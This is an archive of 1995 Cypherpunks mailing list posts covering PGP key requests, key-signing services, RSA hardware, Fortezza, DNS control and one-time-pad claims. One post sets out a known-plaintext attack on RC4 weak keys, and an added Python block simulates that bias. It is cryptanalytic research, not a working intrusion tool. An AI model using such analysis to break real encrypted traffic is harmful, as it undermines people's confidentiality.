>  From: patrick@Verity.COM (Patrick Horgan)
>  
>  > 
>  > 	but the key was not there.  Please mail me your key.  Thank you.
>  > 
>  > constructive suggestion as to how this mail could be changed
>  > to convey more information or to be less "threatening", please mail me.
> 
>  Sure, I found the above offensive.  It comes across in exactly the same
>  tone as a cop saying, "Please step away from the car."

Ack!  ;)  Not my intention at all, but a good observation...

>  The simple change:
>  
>        but the key was not there.  Could you please mail me your key?  Thanks.
>  
>  works miracles:)  The tone on the rest of it was nice.  You have to be careful
>  with imperatives.  They usually sound mean...even with a please at the front.

I got this letter in favor of some change in the wording, and a few
letters saying "wording is fine as is".

I assume that those who currently have no beef with the wording will
not be offended by the added words, thus I have happily integrated
Patrick's suggestion.

I have also added to the code a list of people who don't like
receiving key-queries, added a test that gives an error if the user
attempts to send a key-query to such an address, and made TCM's
address the default value for the list.

I have also added code to maintain a disk-based list of addresses that
have already been mailed for a key, and added code that checks against
this list before sending mail.

I'll put this latest version of mail-secure.el (also upgraded to work
with the latest version of mailcrypt (3.3)) on my web page within a
day or so.  Until then, anyone who wants a copy can mail me.

To those who sent polite suggestions: thank you.  Your constructive
criticism has helped make mail-secure.el a better tool.  

I encourage anyone else who has suggestions or comments to mail me.  I
try to be responsive to constructive input, as doing so helps the
package improve, be accepted and get used.

TJIC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Thu, 28 Sep 95 10:06:43 PDT
To: cypherpunks@toad.com
Subject: sled corp
Message-ID: <01HVT6WVKX368ZE7S0@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello C-Punks,

I recently found a company called "sled corp" at
<http://www.411.com/> 

they are a white pages directory service (who i have absolutely no
relationship with) that claims they will sign someone's pgp key for
$20/year. to verify the identity of the person's key they are
signing, they require either 1) a mailed or faxed copy of a driver's
license,  2) mailed or faxed copy of a passport,   or 3) a preprinted
personal check (which cleared).

i'm not sure how much i would trust this type of signature anyway, as
all 3 of the above methods of identification can be easily forged,
but i'd appreciate some comments by some of the folks out there that
have considered the concept of key signatures. 

if anyone has had any dealings with this company, i would appreciate
any comments on them. 

feel free to contact me privately if you'd like at either

amp
<0003701548@mcimail.com>
<alan.pugh@internetmci.com>
PGP Key = 4A2683C1
PGP FP = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D
September 28, 1995   12:58
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Thu, 28 Sep 95 13:17:47 PDT
To: cypherpunks@toad.com
Subject: Re: Using sound cards to accelerate RSA?
Message-ID: <199509282017.NAA20380@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>Somebody mentioned the possibility of using the a/d stage of a sound card
>as a source of random bits, and that brought a thought back to mind:
>given that a lot of sound cards are now shipping with DSP chips on board,
>has anyone written any code that uses the cards DSP to accelerate RSA
>processing?

But most sound cards still don't have DSP chips. And modern general
purpose CPUs are beginning to give them such a good run for their money
that I wonder whether DSPs will ever become widespread.

I'd stick with running RSA on the main CPU for now.

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Thu, 28 Sep 95 11:13:24 PDT
To: cypherpunks@toad.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <199509281813.OAA20769@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Thu Sep 28 14:13:09 1995

>  To: cypherpunks@toad.com
>  From: tcmay@got.net (Timothy C. May)
>  
>  At 6:33 PM 9/27/95, Travis Corcoran wrote:
>  
>  What I call a robo-warning was this:
>  
>  "  P.S.  This mail was composed by my mailreading sftwr, which
>          automatically scans incoming mail, looking for failed keyserver
>          requests, and prompts me whether it should automatically send this msg
>          on my behalf.  If there is a bug w this sftwr (for example, you never
>          PGP sign your msgs, so this entire msg makes no sense), or if you're
>          interested in the software itself (mail-secure.el: a package in lisp
>          for emacs; this is just one of the many crypto/privacy related things
>          it does) please mail the author of this package ( tjic@openmarket.com)
>          for details.

Well, I still don't understand why you call a message that says 
	1) "I tried to verify a signature"
	2) "please mail me your key"
	3) "if there's a bug, please mail the author"
a "warning".  

I guess we're just using the word "warning" differently...

>  As to whether I needed to respond to your robo-warning about how
>  your automatic scan of incoming mail produced some kind of
>  Signature Failure Condition Red at your end, I just ignored your
>  message.

I never stated or implied that anyone "needed to" respond to
query-mail.  To the contrary, I said in all seriousness that ignoring
query-mail was "a fine anarchistic solution to the problem".

>  As others will attest, when people ask me for my key in a
>  non-automated way, I usually send it to them.

Well, I still don't understand your objection to labor-saving software
any more than I understand the lifestyles of the Amish, but that's my
problem, not anyone else's.

>  My _overall_ point was not to attack Travis C., who I don't think I
>  even mentioned by name, but to point out that great care must be
>  taken in running automated mail-response programs

I did not take your comments on mail-secure.el as an attack on myself,
but I did want to defend both the use of labor-saving software and
parts of my particular implementation.  Specifically, I defended the
package against incorrect accusations on your part:

1) the query-mail was not a warning
2) the query-mail was not in response to the content of a post
3) the query-mail was not the first method used, but a last-ditch attempt
4) a human is in the loop
5) the keyserver used is not based on some trivial "preference"

However, I do agree whole-heartedly with your above assertion that
"great care must be taken in running automated mail-response
programs".  For this reason I have responded to your and other posts
by adding features to the package to make it even less likely to
bother people who don't want to be bothered.

>  Finally, since Travis is making a fairly big deal over my citing of
>  his post (though anonymously, as I recall), I'd like to see the
>  post he claims I signed.

To the very best of my knowledge *I* did not send you a piece of mail
requesting your key...I've had your key in my keyring for over a year.
Further, I am not asserting that I saw a signed message from you any
time recently.

>  >If anyone has a constructive suggestion as to how this mail could be
>  >changed to convey more information or to be less "threatening", please
>  >mail me.
>  
>  Simple, don't bother to ask in the first place. Or ask informally, in
>  ordinary English. Skip the "This mail was composed by my mailreading sftwr,
>  which automatically scans incoming mail, looking for failed keyserver
>  requests..." nonsense.

Nonsense?  It seems to me that the information is useful, for two
reasons:

(1) it alerts the recipient to the semi-automated nature of the mail,
		which allows the recipient to prioritize his response (if any)
		to it.
(2) it alerts the recipient that incorrect receipt of a key-request
		could be caused by a software bug (as opposed to some attempt
		to forge email).
(3) it notes the existence of the package, which the recipient might
		be interested in (in the same way many cryptography-aware
		programs add a comment line to a PGP-signature).  By the way,
		I have had several people ask for a copy of mail-secure.el after
		receiving a key-request from the package, which translates
		into several more people encrypting their email and verifying the
		messages they receive.
  
>  I don't need some fraction of them running their own "key etiquette
>  agents" inspecting my posts for conformance to their preferences.

Once again you're [ willfully ? ] missing the point: etiquette and
preferences have nothing to do with it, and your repeated assertions
to the contrary trivialize the desire of some people to authenticate
messages they receive (which I and others consider to be a reasonable
goal).

- - -- 
TJIC (Travis J.I. Corcoran)       http://www.openmarket.com/personal/tjic/

                             Member EFF, GOAL, NRA.
                 opinions (TJIC) != opinions (employer (TJIC))
         "Buy a rifle, encrypt your data, and wait for the Revolution!"
	  PGP encrypted mail preferred.   Ask me about gnuslive.el for emacs.

-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: Auto-signed by mail-secure.el 1.002 using mailcrypt
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMGrlu4JYfGX+MQb5AQGiSwP+MMgoog/vmsxKU5Zo17L5ZE3KVlYWsbQ7
9kcVb8d2CLPyAyaU4iNmF5dLwdYyy0reft9jhzQAaZ/1Nm0+9KXGAhT7DdO2nDFT
hGc9KiQ/IYEkkhkRJIRRNkVNGeWclbf9J/ffQUUNBBTBbJkjjwoLFns+GA6D2Qx/
xs8QFel7kvQ=
=6Gyn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Thu, 28 Sep 95 11:38:41 PDT
To: sameer <sameer@c2.org>
Subject: Re: awards for hacking microsoft
In-Reply-To: <199509281642.JAA26140@infinity.c2.org>
Message-ID: <Pine.SOL.3.91.950928143432.18471A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Sep 1995, sameer wrote:

> 	I've been working on putting together my hack microsoft
> promotion and I need to think of a good low-budget award. T-shirts
> would not be economically feasible -- I expect to be awarding many
> microsoft awards.. Ideas would be appreciated. Thanks.
> 

What else, Chaum's Digicash.  If you are unwilling to part with any of 
your own, perhaps you can collect contributions, or maybe the Digicash 
people will pony-up some extra cyberbucks for a good cause.  After all, 
they are worth the paper they're printed on. :-)

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Thu, 28 Sep 95 15:03:52 PDT
To: stewarts@ix.netcom.com
Subject: Re: 2^25 Crays a Year to Break STT
Message-ID: <9509282305.AA09854@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


don't you love how the media gets the story straight?

----------
From: Bill Stewart  <stewarts@ix.netcom.com>
To:  <cypherpunks@toad.com>
Subject: Re: 25 Crays a Year to Break STT
Date: Thursday, September 28, 1995 10:33AM

>   Microsoft said its Secure Transaction Technology (STT), was
>   designed to provide a much higher level of security for
>   credit card transactions on the Internet. Netscape's
>   general purpose encryption system uses a 40 or 128-bit
>   electronic "key", while STT will use 2,000-bit keys.
Sigh.  Apples and oranges, and they know it.
.....
>   Although no encryption system was totally secure, Mr Dent
>   estimated it would take "25 Cray supercomputers a year" to
>   break the STT codes.

So how much work can 25 Crays do in a year?  Crack single-DES?
Maybe RC4/64?
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Thu, 28 Sep 95 13:51:15 PDT
To: "'SMTP:tomw@orac.engr.sgi.com>
Subject: RE: More on "Entropy"
Message-ID: <306B0A5E@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein wrote:

>We used this formulation of entropy in Statistical Mechanics.  It's
>especially useful in Quantum Thermo where you can actually enumerate all
>of the states instead of relying on probabilistic arguments.

Sure, this formulation can be used.  As a pedagogic tool for explaining what 
a theory is all about, many formulations are discussed as if they have 
application in real world situations.  Of course (for pedagogic reasons), 
these discussions focus on systems in which there is a definition, and 
typically a well-behaved mathematical model, for all of the significant 
states.  Some instructors believe this will assist students in appreciating 
the concepts of statistical mechanics and quantum thermodynamics.

To build a working apparatus (or software systems, as we are discussing 
here), the designer is typically faced with the breakdown of well-behaved 
mathematical models.  Everything from degenerate states to the "baked in" 
uncertainty of certain states tends to undermine the mathematical 
foundations of a theorist's constructions.  Of course the theoretical models 
are absolutely critical, but the designer must always caution themselves 
against drawing inferences without measurements and clearly stated 
rationales that speak to these physical realities that lead to mathematical 
weaknesses.  Ultimately, the probabilistic nature of such systems may be 
"moved around," but not removed from the model!

Since the real world of actual measurements interferes with essentially 
everything we claim to "know" about quantities such as entropy, the real 
danger is assigning an independent "meaning" to these constructs.  Why? 
 Because these quantities do not exist independently, they only exist with 
respect to our predictive models of a system's behavior.  So these models do 
not really "enumerate" anything about states, but rather restate the 
probability assumptions of the model in the form of a "working equation."

In addition, drawing inferences as to the behavior of systems based on 
common mathematical form is simply inviting trouble, even at the theoretical 
level.  Mathematical models are not the real world, and the superficial 
mathematical consistency between say, the functional form of a resonance in 
a quantum well and a marble in a bowl, does not mean that the marble gives 
any special insight into the nature of the quantum well.  In fact, beyond 
the curiosity of similar equations, the most important information is in the 
distinctions and clarifications (emanating from theory) between the systems 
from a practical, apparatus building, real world perspective (as contrasted 
with the "everything is just a special case of X" perspective).

This danger is also present in designs for sources of entropy to seed RNGs 
for random data or to create uniformly distributed keys.  Well designed 
models will avoid rephrasing assumptions as conclusions, and will explicitly 
address the mathematical weaknesses upon which the theoretical arguments in 
support of the model are ultimately based.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Roos <andrewr@vironix.co.za>
Date: Thu, 28 Sep 95 07:28:45 PDT
To: cypherpunks@toad.com
Subject: Cryptanalysis of RC4 - Preliminary Results
Message-ID: <9509281628.aa25754@herman.vironix.co.za>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi c'punks & sci.cryptites


About a week ago I posted a message about weak keys in RC4. This is 
an update on the results of my continued 4am sessions with RC4 and 
shows that certain weak keys lead to an almost-feasible known 
plaintext attack on the cipher (well, about as feasible as the 
differential attack on DES, shall we say).

The attack is based on two particularly interesting three-byte key 
prefixes which have a high probability of producing PRNG sequences
which start with a known two-byte sequence. The prefixes are:

1.  Keys starting with "00 00 FD" which have a 14% probability of 
    generating sequences which start "00 00".

2.  Keys starting with "03 FD FC" which have a 5% probability of
    generating sequences which start "FF 03".

Note that the expected frequency of any two-byte output sequence is 
1 in 65536 or about 0.0015%, so these key prefixes are highly 
unusual. I won't go into the reasons why in this post, since it 
follows the same reasoning as my last post, but these prefixes are
special in that they have a high probability of initializing the RC4 
state table in such a way that the first two generated bytes depend 
only on the first three entries in the state table.

This observation is the basis for a simple known-plaintext attack
which reduces the effective key space which you need to search to
have a 50% probability of discovering a key by about 11.2 bits. The 
down side is that you need "quite a few" known plaintexts to make the 
attack feasible. 

It works as follows:

1.  Collect a large number of known plaintexts (and hence known 
    generator sequences).

2.  Discard generator sequences which do not start with "00 00" or 
    "FF 03".

3.  For generator streams starting "00 00", search all keys which
    begin with "00 00 FD".

4.  For generator streams starting "FF 03", search all keys which
    begin with "03 FD FC".

5.  Keep going until you find a key :-)

Clearly this attack will only discover a small fraction of the keys.
However since most generator sequences are discarded without being 
searched, and for those which are searched the search is 2^24 smaller 
than would be required to search the entire keyspace, the number of 
trials required to determine a key is significantly lower than for 
brute force alone.

Enough of an intro, here are the relevant results. Forgive my 
simplistic approach to maths, I'm a philosopher-cum-software 
developer, not a mathematician. I've run the relevant simulations 
with 40-bit, 64-bit, 80-bit and 128-bit key lengths, and with two
different PRNGs. For the sake of consistency with my earlier paper 
I'll use the figures gathered for 80-bit keys (this seems to be RSA's
preferred key length for RC4), but there are no significant 
differences for other key lengths. The PRNG used for these tests was 
L'Ecuyer's 32-bit combined linear congruential generator as described 
in "Applied Cryptography" p. 349.

(a) Out of one million trials, keys starting with "00 00 FD" 
    generated sequences starting "00 00" 138217 times, and keys 
    starting with "03 FD FC" generated output sequences starting "FF 
    03" 50490 times.

(b) Out of ten million trials, arbitrary pseudo-random keys generated
    sequences starting with "00 00" 446 times, and sequences starting
    with "FF 03" 146 times. (Note the abnormally high incidence of 
    "00 00"; the expected mean is 152.8).

Suppose we have the output stream generated by a randomly chosen key.
The chance that it will start with either "00 00" or "FF 03", and 
that we will therefore search it, is:

    (446 + 146) / 1e7 = 5.92e-5

The chance that it starts with "00 00" and was generated by a key 
starting with "00 00 FD", or that it starts with "FF 03" and was 
generated by a key starting "03 FD FC" - i.e. the chance that we will
search it and be rewarded for our efforts - is:

    (138217 + 50490)/(1e6 * 2^24) = 1.12e-8

The total number of plaintexts required for a 50% chance that we will
discover one of the keys is:

    log(0.5)/log(1 - 1.12e-8) = 61 900 000

Well I did say "quite a few" plaintexts would be necessary :-) 

And the number of plaintexts which you expect to search in order to 
find the "right" one is:

    61 900 000 * 5.92e-5 = 3665

Since the total key length is 80 bits, and we are "guessing" 24 of 
these, each search requires 2^56 trials. Hence the total number of 
trials for a 50% chance of discovering a key is:

    3665 * 2^56 = 2.64e20 = 2 ^ 67.8

Since brute search alone would require 2^79 trials for a 50% chance 
of determining the key, this reduces the number of trials by 2^11.2.

The results are essentially identical for all the key lengths I have
tried, and in each case reduce effective key length by about 11.2 
bits. So, for example, a 64-bit key would normally require 2^63 
trials for 50% chance of solution; this attack reduces the number of
trials to 2^51.8 at the cost of requiring 62 million known plaintexts.

I'm still running simulations to check my maths, and although initial
results are encouraging, I don't have enough data for it to be
statistically relevant yet (generating all these sets of 62 million 
known streams takes time...) So consider this preliminary (again),
and I'll post the results of my simulations when I have enough 
data.


Andrew

________________________________________________________________
Andrew Roos <andrewr@vironix.co.za>

// C++ programmers have class (but not much inheritance)

PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGrlfmatuqa4OR+lAQF1eQP+IBBmSztAYUpq1q/BjzvYDCbb+Ns0Gi1S
u9wTaZOCl32fdp7NSUEQBX39nVJkQZginug56BZXzijRvOx6fl4+z7dmW9jwtE5E
YNCOhx+/fHX4psszMyEUTrnza7MYDc4HXlgv743LOD/xvEyU0D5OGgB5fg+lyhAK
6xQ/Zy8JpE8=
=BdMn
-----END PGP SIGNATURE-----
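
The two bias figures and the work-factor arithmetic in the message above can be checked with a short simulation. This is an added example, not code from the original post: it uses textbook RC4, draws the non-prefix key bytes from Python's seeded `random` module rather than the L'Ecuyer generator the post names, and all function names are this example's own.

```python
import math
import random


def rc4_first_bytes(key: bytes, n: int = 2) -> bytes:
    """Textbook RC4: run the key schedule, return the first n keystream bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                         # output generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Key prefix -> keystream start, exactly as listed in the post.
WEAK_CLASSES = {
    bytes.fromhex("0000FD"): bytes.fromhex("0000"),
    bytes.fromhex("03FDFC"): bytes.fromhex("FF03"),
}


def measure_bias(prefix: bytes, trials: int, key_len: int = 10, seed: int = 1995) -> float:
    """Fraction of keys with this prefix whose keystream starts as the post says.

    key_len=10 gives the 80-bit keys the post reports on; the seed is an
    arbitrary constructed value so that runs are repeatable.
    """
    rng = random.Random(seed)
    want = WEAK_CLASSES[prefix]
    hits = 0
    for _ in range(trials):
        tail = bytes(rng.randrange(256) for _ in range(key_len - len(prefix)))
        if rc4_first_bytes(prefix + tail) == want:
            hits += 1
    return hits / trials


def has_weak_prefix(key: bytes) -> bool:
    """Key-generation screen: reject keys that fall in either class from the post."""
    return key[:3] in WEAK_CLASSES


def work_factor(key_bits: int = 80) -> dict:
    """Redo the post's arithmetic from its own trial counts, without rounding."""
    p_search = (446 + 146) / 1e7                     # stream starts 00 00 or FF 03
    p_reward = (138217 + 50490) / (1e6 * 2 ** 24)    # ...and the key has the prefix
    plaintexts = math.log(0.5) / math.log1p(-p_reward)
    searches = plaintexts * p_search
    trials_log2 = math.log2(searches) + (key_bits - 24)
    return {
        "plaintexts": plaintexts,
        "searches": searches,
        "trials_log2": trials_log2,
        "bits_saved": (key_bits - 1) - trials_log2,  # brute force: 2^(bits-1)
    }


if __name__ == "__main__":
    for prefix, start in WEAK_CLASSES.items():
        rate = measure_bias(prefix, trials=20000)
        print(f"prefix {prefix.hex()} -> stream {start.hex()}: {rate:.2%}")
    for name, value in work_factor().items():
        print(f"{name}: {value:.4g}")
```

The unrounded arithmetic gives slightly smaller intermediate values than the post, which rounds the reward probability to 1.12e-8 before taking the logarithm.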





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Thu, 28 Sep 95 13:44:09 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
In-Reply-To: <199509281309.JAA12017@bwh.harvard.edu>
Message-ID: <199509282054.QAA26219@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>This came across the SSL mailing list.  Anyone know Taher's position
>on key-escrow?

Oh, come on.  One does not have to "support key escrow" to be interested
in Fortezza.  The Fortezza interface does not have any "escrow-specific"
features; it's actually a pretty good crypto API (for which several vendors
plan to produce compliant, non-escrowed PCMCIA cards).  The Fortezza market
(in the government) is also pretty big, by the way, so one can hardly
blame any vendor for being interested in it.

Disclaimer: I'm also an evil "Fortezza sympathizer".  I built a (Tessera,
actually) version of CFS last year.  I think it's a good interface,
and I'd encourage people to  build strong, non-escrowed crypto modules
(in hardware and in software) that conform to it...

-matt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@robo.remailer
Date: Thu, 28 Sep 95 17:09:31 PDT
To: cypherpunks@toad.com
Subject: Re: "Notes" to be Eclipsed by "Netscape"
In-Reply-To: <Pine.HPP.3.91.950928205053.16699C-100000@cor.sos.sll.se>
Message-ID: <199509290004.RAA28740@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In an interview today in a Stockholm paper with a technical spokes-
> person for Hewlett-Packard (about the HP internal net with 19
> worldwide connections to the Internet - by the way, allegedly
> no one has ever succeeded in breaking their firewalls) it was

	"allegedly". Well I suppose you don't need to break the HP
firewall to get past it, so I guess that could be an appropriate
statement.
	(I adminned a few of their firewalls for a short time on
contract while the person who was normally in charge of them was
away. Calling it a firewall is a stretch of the word-- They allow
telnets from sites at berkeley.edu and stanford.edu with reusable
passwords, for one example.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 28 Sep 95 17:19:04 PDT
To: cypherpunks
Subject: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <9509290018.AA08111@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded-by: gordoni@base.com (Gordon Irlam)

Thought you might find this interesting.  I don't know if you have
thought about it or not, but control over the root name service plus
some funky software is all that it takes to be able to selectively snoop
on all the packets addressed to any host on the net.  DNS is currently
the achilles heel of a secure internet...

                                                     gordoni

From:  Wes Thomas <wes@ora.com>

The press recently reported that the National Science Foundation has turned
over Internet Domain Name registration to Network Solutions, Inc. (NSI) of
Herndon, VA. The press failed to note some interesting connections.

Tomorrow morning (Sept. 26), Web Review, a biweekly online magazine (see
Special Report at http://gnn.com/wr/) will reveal that NSI was purchased in
May by Scientific Applications International Corporation (SAIC) of San
Diego. SAIC is a $2 billion company indicted by the Justice Department on
ten felony counts for fraud in managing a Superfund toxic cleanup site (SAIC
pleaded guilty) and sued by the Justice Department for civil fraud on an
F-15 fighter contract.

SAIC's board members include Admiral Bobby Inman, former NSA head and deputy
director of the CIA; Melvin Laird, Nixon's defense secretary; and retired
General Max Thurman, commander of the Panama Invasion. Recently departed
board members include Robert Gates, former CIA director; William Perry,
current Secretary of Defense; and John Deutch, the current CIA director.
Current SAIC government contracts include re-engineering information systems
at the Pentagon, automation of the FBI's computerized fingerprint
identification system, and building a national criminal history information
system.

"At the very time the Internet community is struggling with the issues of
encryption and privacy, I'm more than a little uneasy to find this bunch of
ex-spooks sitting at the very entry point of the Net," says Jim Warren (a
leading activist in making government records accessible) in the article,
which was written by investigative journalist Stephen Pizzo, Web Review
Senior Editor and co-author of the book Inside Job, an expose on the savings
& loan looting.

Web Review is produced by Songline Studios, an affiliate of O'Reilly &
Associates.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 28 Sep 95 15:26:57 PDT
To: cjl <cjl@welchlink.welch.jhu.edu>
Subject: Re: awards for hacking microsoft
Message-ID: <9509282225.AA04018@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  What else, Chaum's Digicash.  If you are unwilling to part with
>  any of your own, perhaps you can collect contributions, or maybe
>  the Digicash people will pony-up some extra cyberbucks for a good
>  cause.  After all, they are worth the paper they're printed on.
>  :-)

Don't tell that to the people on the ECM mailing list!  People there have  
been trading cyberbucks for RealMoney.  The last successful trade I saw was  
100 cyberbucks for 4 UK pounds...

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 28 Sep 95 17:51:04 PDT
To: cypherpunks@toad.com
Subject: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID: <v02120d16ac90fe1bdb12@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



[Tim May writes about why crypto h/w acceleration using DSPs,
and DSPs in general, are likely doomed niche markets.]

I pretty much agree with Tim, except it's important to realize
that for a _server_ that is doing a lot of RSA operations, the
difference between a 3.2 second encryption and a 1.9 second
encryption is significant. Peak transaction volume for any
public key-based payment system is going to be a factor of how many
RSA ops you can do per second.

It seems clear though that what's desired for this scenario is
good, dedicated hardware based on ASICs. I've been trying to buy
a sample board from Uti-Maco in Belgium, which looks ideal for
this sort of thing, but have finally given up in the face of
communications problems, their fear of RSA Labs, new Belgian
export controls they haven't tried to work with yet, and their
belief that I need a US crypto import license, which I can't persuade
anyone to admit _exists_.

Anyhow, for personal use, the only dedicated hardware we're likely
to see will not be focused on speed, but rather on security. Stuff
like the various PCMCIA cards from Nat Semi and Telequip, the
"decoder rings" and "decoder keychain do-dads" and so forth that
have security and convenience benefits.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Thu, 28 Sep 95 14:57:39 PDT
To: cypherpunks@toad.com
Subject: NPR reports on Digital Express Secure Telephone
Message-ID: <199509282157.RAA23858@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Digital Express coverage on NPR.  Seastrom and Shiller(sp?) talking
over a powerbook using PGPPhone.  Demonstrating secure telephones!

Edward Appel, director of counterintelligence FBI representative on
National Security Council is quoted.  "It's very easy for a criminal
or a terrorist or a spy to use this for their advantage."

Reporter "You can connect to an MIT computer and get pgp-phone, you
have 

MIT Press 900 page book from PGP!  "You can carry that book with you,
anywhere you want in the world... Export control laws don't cover
books..."

Hal Abelson, MIT advisor to MIT press, etc, etc, ...

Appel "It's clearly not some weird form of poetry.  It is source code,
it is a program, ... if you can use it to tell the computer what to do
then it is part of the machine itself..."

The authors of PGP say "The real threat is that this technology is not
distributed widely enough..."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 28 Sep 95 18:43:51 PDT
To: cypherpunks@toad.com
Subject: Re: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: <199509290031.TAA24720@lab21.eng.auburn.edu>
Message-ID: <199509290143.SAA19419@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Doug Hughes <Doug.Hughes@Eng.Auburn.EDU> writes:
> you are really worried about security. This initial transaction serves
> as a seed for subsequent transactions. All subsequent transactions
> depend on preceding transactions. A degree of randomness comes from the
> randomness of the messages. Each next word in the message is random.

> After the initial exchange every message sent subsequently gets randomized
> from the previous randomness of the messages plus something in the table.

OK, you expected this, but here goes anyway.  This isn't a one time pad
because the "randomness" isn't really random -- it depends on a bunch of
plaintext.  Technically from your description this looks like a plaintext
autokey system.  A true OTP requires honest to goodness physically random
key material for the pad.  It may be quite strong, but it just doesn't
fit the definition.

Sigh.

People keep throwing OTP around because it's the only known perfect system --
until we get quantum crypto, I suppose -- but few companies actually want to
go to the trouble to implement the real thing.  And with good reason -- it's
a nuisance to do secure exchanges on the keying material.

	Jim Gillogly
	Sterday, 8 Winterfilth S.R. 1995, 01:41




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 28 Sep 95 16:26:20 PDT
To: cypherpunks@toad.com
Subject: VISA and Microsoft STT Specs available
Message-ID: <9509282326.AA25864@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	The specs for STT are now available. Due to various circumstances
too complex to explain these are currently being served via the W3C web server 
at :-

http://www.w3.org/hypertext/WWW/Payments/STT.html

This does not constitute an endorsement of these specifications by W3C nor
any representation of the fitness thereof. 

Note that these documents may well move in the future.


For more payments related info see:-

http://www.w3.org/hypertext/WWW/Payments/

The roadmap has been updated appropriately.


		Phill Hallam-Baker



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 28 Sep 95 17:31:18 PDT
To: cypherpunks@toad.com
Subject: worldwide announce: New OTP Mail/FTP apps
Message-ID: <199509290031.TAA24720@lab21.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



A company in Israel named Elementrix has just announced at Interop an
entirely new paradigm in secure transactions. They have a secure
one time pad that allows people to exchange mail and ftp files back
and forth in complete security without the worries of key management
or storage or secure random number generation or synchronization.

In the words of Winn Schwartau: "This really fucks with your brain"

Both he and David Kahn have gotten information out of non-disclosure, as
well as several other un-named experts in cryptography about the nature
of this new development. They were astounded and have provided assurances
as to its authenticity and ability to work as advertised. So far they
have not released the complete protocol, but plan to do so as soon as
the Patent issues pending in several countries have been resolved. The
protocol will be completely published and subject to scrutiny by 
everybody. 
 To me it looks like it would be trivial for them to integrate it into
any and all kinds of browsers, clients and applications. Of course, I do
not have a complete knowledge of the entire protocol, but the brief
overview was simple enough to understand in concept. If it can work in
FTP, it can surely work in telnet as well, it's just a different front
end over a TCP/IP connection.
 I realize that there will be those out there on this list who will
immediately dismiss this as a hoax, as would have I had I not seen
